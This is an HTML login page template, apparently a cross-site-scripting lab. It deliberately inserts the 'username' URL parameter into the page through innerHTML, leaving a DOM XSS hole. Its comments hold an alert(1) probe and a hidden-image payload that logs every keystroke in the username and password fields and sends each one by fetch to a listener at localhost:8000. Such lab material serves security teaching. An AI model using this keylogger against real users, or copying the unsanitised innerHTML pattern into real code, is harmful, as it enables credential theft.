{{ template "stylesheet.html" .}}

<div id="error"></div>
<h1 class="title">CLICK ON THIS CAT</h1>
<form class="login" action="/login">
    <input id="username" class="login-input" placeholder="Enter your username..." name="username" type="text">
    <input id="password" class="login-input" placeholder="Enter your password..." name="password" type="password">
    <button class="login-submit" type="submit" formmethod="post">Login</button>
</form>

<script>
function renderError(){
    var urlParams = new URLSearchParams(window.location.search);
    var username = urlParams.get('username');
    if (username != null && username.length > 0) {
        var errorDiv = document.getElementById("error");
        errorDiv.innerHTML = "Incorrect login for user: " + username; // eg. <img src=x onerror="alert(1)">

        //<img src=asdf style="visibility: hidden;" onerror="f=function(e){fetch((`http://localhost:8000/${String.fromCharCode(e.charCode)}`), {mode: 'no-cors'});};document.getElementById('username').onkeypress=f;document.getElementById('password').onkeypress=f; document.getElementById('error').style.display = 'none';">
    }
}
renderError();
</script>
